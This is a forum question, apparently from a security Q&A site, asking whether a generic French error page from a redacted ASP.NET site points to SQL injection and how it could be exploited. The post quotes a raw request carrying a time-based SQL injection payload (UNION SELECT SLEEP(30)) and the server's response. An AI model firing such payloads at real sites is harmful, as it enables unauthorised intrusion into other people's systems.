I think I found an SQL vulnerability; the request and response can be found below. I'm not sure because it is showing a normal error (it's in French) instead of showing an SQL error.
I also tried to SQL inject the user page (after I logged in normally to the site) by adding a quote (') to a parameter, but I got the same normal error instead of the SQL one.
Could someone experienced tell me if this is an SQL error message and if an exploit is possible? If yes, how can someone exploit this?
GET /Anonym/Login.aspx?lnrid=636705509463187707" UNION SELECT SLEEP(30) -- &_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&__EGClientState=NY&__VIEWSTATE=NY&__EVENTVALIDATION=%2FwEdAAivVXD1oYELeveMr0vHCmYPbKvSQfBZG4FRSb%2F8I7pm6gbzWSkUOVnL89VotOv3iwS9OtS9D9WQklHFFt9eID42Uj1o80q1QHHhR9Njbuhhm5HMJLG0qgnnIQHDWK64dEQaUDEQ2ba3nFNQp5gIEycdbMy1%2F4YQMXKqdpE3Qw%2F6%2Fw%3D%3D&egWindowManager%24clientWindow%24Oui=Oui&egWindowManager%24clientWindow%24Non=Non&egWindowManager%24clientWindow%24Ok=Ok&ctlUserCode=vega&ctlUserPassword=vega&ctlLogon=Connexion
Host: redacted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Date: Fri, 24 Aug 2018 07:37:32 GMT
Content-Length: 2082
[error page; only relevant parts:]
<body>
<form name="FrmErr" method="post" action="../PageErreur.aspx?lnrid=636705509463187707%22+UNION+SELECT+SLEEP(30)+--+&_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&__EGClientState=NY&egWindowManager%24clientWindow%24Oui=Oui&egWindowManager%24clientWindow%24Non=Non&egWindowManager%24clientWindow%24Ok=Ok&ctlUserCode=vega&ctlUserPassword=vega&ctlLogon=Connexion" id="FrmErr">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTk3MzY5NzU2NmRk" />
</div>
<div class="Outer">
<div class="Middle">
<div class="Inner">
<div class="ErrMsg">
<table style="margin: auto;">
<tr>
<td><img id="ImgLogo" src="../Logo.gif" style="border-width:0px;" /></td>
<td> </td>
<td><br />Le site éprouve présentement des difficultés, nous sommes désolés du contretemps.</td>
</tr>
</table>
<hr width="60%" noShade="noShade" SIZE="0" />
</div>
</div>
</div>
</div>
</form>